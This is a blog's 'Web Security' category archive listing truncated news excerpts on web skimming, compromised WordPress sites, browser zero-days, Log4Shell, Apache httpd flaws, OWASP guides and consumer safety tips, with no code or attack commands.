Archive for the ‘Web Security’ Category

Microsoft warns of new highly evasive web skimming campaigns

Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection. Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection. The threat actors obfuscated the skimming script by encoding it in PHP, which, in turn, was embedded in […]

Leave a Comment

Massive hacking campaign compromised thousands of WordPress websites

Researchers uncovered a massive hacking campaign that compromised thousands of WordPress websites to redirect visitors to scam sites. Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content. The infections automatically redirect site visitors to third-party websites containing malicious content […]

Leave a Comment

Keep your digital banking safe: Tips for consumers and banks

Digital banking has been a reality for quite a while now, particularly pushed forward in these last few years. Is security keeping up the pace? Online banking and mobile banking apps have made great security strides in recent years. In fact, some of today’s most well-respected banks are improving security measures by offering SMS or […]

Leave a Comment

Burp Suite overview

Burpsuite, the proxy-based tool used to evaluate the security of web-based applications and do hands-on testing developed by PortSwigger. It is one of the most popular penetration testing and vulnerability finder tools and is often used for checking web application security. Web App Security 👇 Please Follow our LI page…

Leave a Comment

Compromised WordPress sites launch DDoS on Ukrainian websites

Threat actors compromised WordPress sites to deploy a script that was used to launch DDoS attacks, when they are visited, on Ukrainian websites. MalwareHunterTeam researchers discovered the malicious script on a compromised WordPress site, when the users were visiting the website the script launched a DDoS attack against ten Ukrainian sites. The JavaScript was designed […]

Leave a Comment

Chrome emergency update fixes actively exploited a zero-day bug

Google addresses an actively exploited zero-day flaw with the release of Chrome 99.0.4844.84 for Windows, Mac, and Linux. Google fixed an actively exploited high-severity zero-day vulnerability with the release of Chrome 99.0.4844.84 for Windows, Mac, and Linux. Google has released Chrome 99.0.4844.84 for Windows, Mac, and Linux users to address a high-severity zero-day bug, tracked […]

Leave a Comment

Firefox patches two in-the-wild exploits – update now!

Mozilla has published Firefox 97.0.2, an “out-of-band” update that closes two bugs that are officially listed as critical. Mozilla reports that both of these holes are already actively being exploited, making them so-called zero-day bugs, which means, in simple terms, that the crooks got there first: We have had reports of attacks in the wild abusing [these] […]

Leave a Comment

OWASP Testing Guide

Owasp-testing-guide-4.0Download Owasp A Complete Guide

Leave a Comment

OWASP Vulnerability Management Guide

Owasp A Complete Guide Front End Web Developer Cert

Leave a Comment

High-Severity flaw in 3 WordPress plugins impacts 84,000 websites

Researchers from WordPress security company Wordfence discovered a high-severity vulnerability that affects three different WordPress plugins that impact over 84,000 websites. The vulnerability tracked as CVE-2022-0215 is a cross-site request forgery (CSRF) issue that received a CVSS score of 8.8. A threat actor could exploit the vulnerability to take over vulnerable websites. The flaw impacts three plugins […]

Leave a Comment

All in One SEO Plugin Bug Threatens 3M Websites with Takeovers

A critical privilege-escalation vulnerability could lead to backdoors for admin access nesting in web servers. A popular WordPress SEO-optimization plugin, called All in One SEO, has a pair of security vulnerabilities that, when combined into an exploit chain, could leave website owners open to site takeover. The plugin is used by more than 3 million websites. An attacker […]

Leave a Comment

Apache’s other product: Critical bugs in ‘httpd’ web server, patch now!

Pick a random person, and ask them these two questions: Q1. Have you heard of Apache?Q2. If so, can you name an Apache product? We’re willing to wager that you will get one of two replies: A1. No. A2. (Not applicable.)A1. Yes. A2. Log4j. Two weeks ago, however, we’d suggest that very few people had heard of Log4j, and even amongst those cognoscenti, few […]

Leave a Comment

Google fixed the 17th zero-day in Chrome since the start of the year

Google released security updates to address five vulnerabilities in the Chrome web browser, including a high-severity zero-day flaw, tracked as CVE-2021-4102, exploited in the wild. The CVE-2021-4102 flaw is a use-after-free issue in the V8 JavaScript and WebAssembly engine, its exploitation could lead to the execution of arbitrary code or data corruption. “Google is aware of reports that an exploit for CVE-2021-4102 […]

Leave a Comment

CISA adds Log4Shell Log4j flaw to the Known Exploited Vulnerabilities Catalog

CISA adds Log4Shell Log4j flaw to the Known Exploited Vulnerabilities Catalog The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including recently disclosed Apache Log4Shell Log4j and Fortinet FortiOS flaws. […]

Comments (1)

Cybereason released Logout4Shell, a vaccine for Log4Shell Apache Log4j RCE

Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for a critical remote code execution zero-day vulnerability, tracked a CVE-2021-44228 (aka Log4Shell), in the Apache Log4j Java-based logging library. The Log4j is widely used by both enterprise apps and cloud services, including Apple iCloud and Steam. A remote, unauthenticated attacker can exploit the CVE-2021-44228 to execute arbitrary code on a vulnerable system […]

Leave a Comment

Microsoft Vancouver leaking website credentials via overlooked DS_STORE file

The metadata stored on the file led the researchers to several WordPress database dumps, which contained multiple administrator usernames and email addresses, as well as the hashed password for the Microsoft Vancouver website. Security researchers – us at CyberNews included – routinely use search engines that index publicly accessible Internet of Things (IoT) devices and web servers […]

Leave a Comment

A guide to internet safety for kids

As a resource, the internet is a wonderful place for children to learn, explore ideas, and express themselves creatively. The internet is also key in a child’s social development, helping to strengthen communication skills, for example when playing games or chatting with friends. However, parents should be aware that all these activities often come with […]

Leave a Comment

Experts warn of attacks exploiting CVE-2021-40438 flaw in Apache HTTP Server

Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers. The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an […]

Leave a Comment

There’s More to Threat Intelligence Than Dark Web Monitoring

Dark web monitoring seems to be a hot buzzword in discussions about cyberthreat intelligence (CTI) and how it helps cybersecurity strategy and operations. Indeed, dark web monitoring enables a better understanding of an attacker’s perspective and following their activities on dark web forums can have a great impact on cybersecurity readiness andposture. Accurate and timely knowledge of […]

Leave a Comment

DuckDuckGo Wants to Stop Apps From Tracking You on Android

At the end of April, Apple’s introduction of App Tracking Transparency tools shook the advertising industry to its core. iPhone and iPad owners could now stop apps from tracking their behavior and using their data for personalized advertising. Since the new privacy controls launched, almost $10 billion has been wiped from the revenues of Snap, Meta Platform’s Facebook, Twitter, […]

Leave a Comment